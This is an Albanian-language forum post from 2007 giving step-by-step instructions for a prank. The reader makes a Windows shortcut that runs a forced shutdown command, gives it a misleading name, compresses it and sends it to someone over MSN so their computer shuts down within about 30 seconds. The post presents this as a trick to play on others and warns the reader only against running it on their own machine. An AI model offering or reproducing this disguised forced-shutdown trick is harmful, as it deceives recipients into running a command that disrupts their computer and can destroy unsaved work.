Ku-Crew

Me Ku Crew drejt suksesit...
 
PortalliForumPytėsoriKėrkoRegjistrohuLista AnėtarėveGrupet e Anėtarėveidentifikimi

Share | 
 

 /Nje Fore Per Te Fikur Pc

Shko poshtė 
AutoriMesazh
s-kill

s-kill

Numri i postimeve : 83
Registration date : 27/12/2007

MesazhTitulli: /Nje Fore Per Te Fikur Pc   Sat Dec 29, 2007 12:35 am

--------------------------------------------------------------------------------

me shym pc me fore per 30 sec...

1.kliko dikund ne hapsir te tastin e djatht te mausit
2.new
3.shortcut
4.shutdown -s -f
5.ok
6. ja leni nji emer per ma hanger dikush foren
7. nese don e kompreseon me ja que dikujt per mes msn
8.dhe per 30 sekond pc-se i behete shutdown........
(mos e provo ne pc tande sepse mun me ta shkym ty
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
 
/Nje Fore Per Te Fikur Pc
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
Ku-Crew :: Programe, Mėsime, Seriale, Dizajn :: Ebooks / Tutorial-
Kėrce tek: